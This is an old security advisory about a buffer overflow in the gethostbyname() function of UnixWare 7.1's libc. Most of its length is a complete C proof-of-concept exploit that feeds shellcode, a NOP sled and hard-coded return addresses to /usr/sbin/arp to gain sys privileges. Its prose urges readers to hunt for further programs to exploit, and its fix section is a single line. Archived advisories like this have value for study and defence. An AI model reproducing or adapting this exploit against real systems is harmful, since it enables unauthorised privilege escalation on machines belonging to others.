COMMAND

    gethostbyname()

SYSTEMS AFFECTED

    UnixWare 7

PROBLEM

    Brock Tellier found the following.   A serious bug exists in  UnixWare
    7.1's libc.  A buffer  overflow in gethostbyname() will allow  any
    user to obtain elevated privileges.

    Is this  the same  gethostbyname() overflow  which was  present in
    ancient versions of non-unixware libc's way back when?  Can't  say
    for sure, but given SCO's  record of fixing known holes  (remember
    the OpenServer 5 Xtlib  overflows, still present four  years after
    they were known?), who wouldn't doubt it.

    Any program which uses gethostbyname() with user-defined input  is
    vulnerable to a buffer overflow attack.  These overflows vary  in
    how easily they can be exploited.  The demonstration  program happened
    to be "arp", but any program calling this function will do.   When
    exploiting the dozens of  programs vulnerable to this  hole, don't
    forget  to  check  your  /etc/security/tcb/privs  file  for  other
    non-suid programs which may  allow you to elevate  your privileges
    as well.  See uidadmin  advisory for more info on  UW7's privilege
    system.  Exploit follows.

    /**
     ** UnixWare 7.1 arp exploit yields gid of sys
     ** Demonstrates overflow in uw71's gethostbyname()
     ** use offsets of +-100
     ** Brock Tellier btellier@usa.net
     **
     **/


    #include <stdlib.h>
    #include <stdio.h>

    /* Payload bytes placed inside the oversized argument handed to arp.
     * The embedded string "/tmp/ui" is the path the payload references;
     * the surrounding bytes are x86 machine code the author states is
     * specific to UnixWare 7.1.  The array contains no 0x00 byte, which is
     * why strlen(scoshell) in main() measures its full length. */
    char scoshell[]=
    "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
    "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
    "\xff\xff/tmp/ui\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";


    /* LEN: capacity of the stack buffer built in main().
     * NOP: x86 no-op opcode (0x90) used as filler around the payload. */
    #define LEN 3500
    #define NOP 0x90

    /* cc != gcc, use hard-coded addresses usually within 0x8045xxxx-0x8048xxxx
    unsigned long get_sp(void) {

    __asm__("movl %esp, %eax");

    }
    */

    /* Proof of concept from the advisory.  Builds one long argument for
     * /usr/sbin/arp; per the advisory text, arp passes that argument to
     * gethostbyname(), whose fixed-size buffer is overrun.
     *
     * argv[1] (optional): signed offset added to the hard-coded address.
     * argv[2] (optional): total argument length; taken from atoi() with no
     *                     comparison against LEN.
     * With no arguments the defaults below (offset 100, length 3000) apply.
     *
     * Note: memset, memcpy, strlen and execl are used without including
     * <string.h> / <unistd.h>, so this relies on implicit declarations. */
    int main(int argc, char *argv[]) {

    long int offset=0;

    int i;
    int buflen = LEN;
    long int addr;
    char buf[LEN];

     if(argc > 3) {
      fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
	    exit(0);
     }
     else if (argc == 2){
       offset=atoi(argv[1]);

     }
     else if (argc == 3) {
      offset=atoi(argv[1]);
      buflen=atoi(argv[2]);

     }
     else {
       offset=100;
       buflen=3000;

     }


    /* Base address is hard-coded for UW7.1 (see the commented-out get_sp()
     * above for why); the offset shifts it. */
    addr=0x8046b75 + offset;

    /* The banner says "uid of sys" while the file header says "gid of sys";
     * the diagnostic on the third line prints addr+offset even though addr
     * already includes offset, so it does not show the value written below. */
    fprintf(stderr, "\nUnixWare 7.1 arp exploit yields uid of sys\n");
    fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");
    fprintf(stderr, "Using addr: 0x%x\n", addr+offset);

    /* Fill the buffer with NOP bytes, copy the payload to its midpoint, then
     * repeat addr at a 4-byte stride through the remaining tail.  buf is
     * never NUL-terminated here; it is passed to execl() as-is. */
    memset(buf,NOP,buflen);
    memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
    for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4)
	    *(int *)&buf[i]=addr;

    /* Replace this process with arp, giving it the crafted buffer as its
     * only argument.  On success execl() does not return. */
    execl("/usr/sbin/arp", "arp", buf,
    NULL);

    exit(0);
    }

SOLUTION

	Fix is out.